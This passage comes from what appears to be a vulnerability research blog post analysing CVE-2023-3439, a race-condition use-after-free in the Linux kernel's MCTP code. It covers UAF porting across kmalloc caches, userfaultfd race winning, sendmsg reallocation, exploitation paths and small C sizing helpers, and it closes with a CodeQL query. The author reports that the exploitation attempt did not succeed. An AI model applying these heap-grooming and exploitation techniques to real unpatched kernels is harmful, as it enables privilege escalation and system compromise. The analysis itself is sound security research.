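If mdev->addrs is made to point at a separately allocated "victim" buffer before the call, which is the toy equivalent of a successful reallocation over the dangling pointer, the value returned by toy_newaddr equals the victim's address: the final free releases the victim, not an address array.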

Now, we will have successfully ported the UAF to a structure containing function pointers and useful objects. After a new reallocation with sendmsg, we may have access to new opportunities such as direct code execution or kernel address leak with the new structure.  

The structure that the UAF will be ported to can be selected from the caches kmalloc-32, kmalloc-64, kmalloc-96, kmalloc-128, kmalloc-192, or kmalloc-256. The required number of new addresses should be added to the mdev->addrs object depending on the selected structure. This way, the target structure and mdev->addrs can be kept in the same cache.

Of course, the example we gave above is for a structure in the kmalloc-256 cache. If you want to port the UAF to a structure in the kmalloc-64 cache instead, you can first add 63 addresses and then make the reallocation with your target structure. Then, you can free your target structure with the 64th address. Or you can add 60 addresses and do the UAF porting with the 61st address. Since kmalloc assigns all allocations larger than 32 bytes and up to 64 bytes to the kmalloc-64 cache, it is up to you which value in this range to use.
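The usable range for a given target cache can be computed with a short sketch. As before, the size-class table is an assumption about a typical x86_64 kernel, and struct addr_range and addrs_for_cache are hypothetical names. The result is the number of addresses that must already be present so that the mdev->addrs buffer sits in the chosen cache when the reallocation is made.

```c
#include <stddef.h>

struct addr_range {
    size_t min; /* smallest address count whose buffer lands in the cache */
    size_t max; /* largest address count whose buffer lands in the cache */
};

/* Assumed general-purpose kmalloc size classes up to 256 bytes. */
static const size_t kmalloc_classes[] = {8, 16, 32, 64, 96, 128, 192, 256};

/* Returns the range of address counts that keep the address buffer in
 * the cache of object size `cache`, or {0, 0} if `cache` is not one of
 * the assumed size classes. */
static struct addr_range addrs_for_cache(size_t cache)
{
    struct addr_range r = {0, 0};
    size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);
    size_t prev = 0;

    for (size_t i = 0; i < n; i++) {
        if (kmalloc_classes[i] == cache) {
            r.min = prev + 1; /* one byte more than the previous class */
            r.max = cache;
            return r;
        }
        prev = kmalloc_classes[i];
    }
    return r;
}
```

For kmalloc-64 the sketch yields 33 to 64, which covers both the 63-address and the 60-address variants mentioned above. For kmalloc-256 the upper end is additionally capped by the address limit discussed earlier.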

Now, we can continue with Case 7.  

Case 7 and Case 8 are the other two exploitation paths that can be used besides UAF porting. That gives us three possible exploitation paths for this bug (at least, I found three).  

In Case 7, the mctp_fill_addrinfo function fills in the IFA_LOCAL and IFA_ADDRESS attributes. The values for these attributes are read from the mdev->addrs object, so after a reallocation we can place an arbitrary value in the attributes. That may be a possible exploitation path, so we can add Case 7 to the list.  

In the last case, we encounter the line that the POC code uses to trigger the bug. Here, the value at index 0 of the mdev->addrs object is assigned to the saddr variable. Once saddr has been overwritten, it is used when the mctp_sk_key structure is allocated.  

The general purpose of this structure is to hold the keys that match incoming packets to sockets or contexts. One of the lookup fields it uses for this search is taken from the saddr variable. In other words, saddr serves as one of the values that incoming packets are compared against when searching for a matching key. It is not the only one: there is another variable called peer_addr. We can also add Case 8 to the list as a possible exploitation path. And now it’s time to take a look at the detail we mentioned at the beginning of the blog.  

Even if we win the race condition after triggering the bug, we only get one shot, because when the bug is triggered and the mdev->addrs object is freed, all device entries are cleared as well.  

This means we can use only one of the three paths mentioned above during exploitation. But another problem arises here. As we mentioned at the beginning of the blog, CVE-2023-3439 is a race condition based UAF. In other words, to get the UAF, we must first win the race, and we use userfaultfd to do so. However, userfaultfd lets us win the race in only one of the cases we mentioned: the saddr overwrite in Case 8. Unfortunately, the other cases are not suitable for userfaultfd.  

Beyond this point, we have little chance to continue exploitation because the primitive we have is very limited. We can only overwrite the saddr variable with the value at index 0 of the mdev->addrs object, and that value is not free to choose. To complete the reallocation and pass the sanity checks, we need to set filler->cmsg_len to the length of the reallocation buffer, and cmsg_len is what lands at index 0 of the mdev->addrs object. As a result, we can only overwrite saddr with a limited set of values.  
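To make this limitation concrete, the sketch below computes which byte ends up at index 0 for a given reallocation buffer length. It assumes a Linux userspace struct cmsghdr in which cmsg_len is the first member and a little-endian machine; saddr_for_spray_len and check_saddr_examples are hypothetical names used only for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>

/*
 * Returns the first byte of a control message header whose cmsg_len is set
 * to spray_len. In the scenario described above, this is the byte that the
 * stale mdev->addrs pointer would expose at index 0, and so the value that
 * would be copied into saddr.
 */
static unsigned char saddr_for_spray_len(size_t spray_len)
{
    struct cmsghdr hdr;
    unsigned char first;

    memset(&hdr, 0, sizeof(hdr));
    hdr.cmsg_len = spray_len;
    memcpy(&first, &hdr, 1); /* byte 0 of the header */
    return first;
}

/* Usage: on a little-endian machine byte 0 is the low byte of the length. */
static void check_saddr_examples(void)
{
    assert(offsetof(struct cmsghdr, cmsg_len) == 0);
    assert(saddr_for_spray_len(64) == 0x40);  /* largest kmalloc-64 length */
    assert(saddr_for_spray_len(33) == 0x21);  /* smallest kmalloc-64 length */
    assert(saddr_for_spray_len(256) == 0x00); /* low byte wraps to zero */
}
```

For a buffer that must stay in the kmalloc-64 cache, for example, the lengths 33 to 64 give only the values 0x21 to 0x40 under these assumptions, so the overwrite is tied to the cache we need to hit.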

Although this was not a successful exploitation attempt, we analyzed CVE-2023-3439 in depth and examined it from different angles. We used userfaultfd for reallocation, analyzed a possible UAF porting scenario, and had the opportunity to look at the mctp subsystem.  

Finally, let’s end the blog with the CodeQL query we used to find the places where the mdev->addrs object is used.  

import cpp

from PointerFieldAccess ptr
where ptr.getTarget().getEnclosingElement().(Struct).getName().indexOf("mctp_dev") != -1
  and ptr.toString().matches("addrs")
select ptr.getLocation()

CodeQL is a very powerful static analysis tool, and it can be especially useful in vulnerability research.   

Using the PointerFieldAccess class, we first tell CodeQL to select every field access made through a pointer where the field belongs to a struct whose name contains mctp_dev.  

Then, among these pointer accesses, we keep only the ones that access the addrs field.  

Finally, we use the getLocation predicate to see the lines of code that match the filters above. This gives us the eight results that we discussed earlier.  


CONCLUSION  

This blog post provided a detailed analysis of CVE-2023-3439, covering environment preparation, bug triggering, reallocation, and possible exploitation paths. Alongside the other exploitation paths, we also discussed UAF porting in the exploitation section, hoping to give readers new ideas and broaden their perspective. Thank you for reading this blog. We aim to help others learn to perform security research.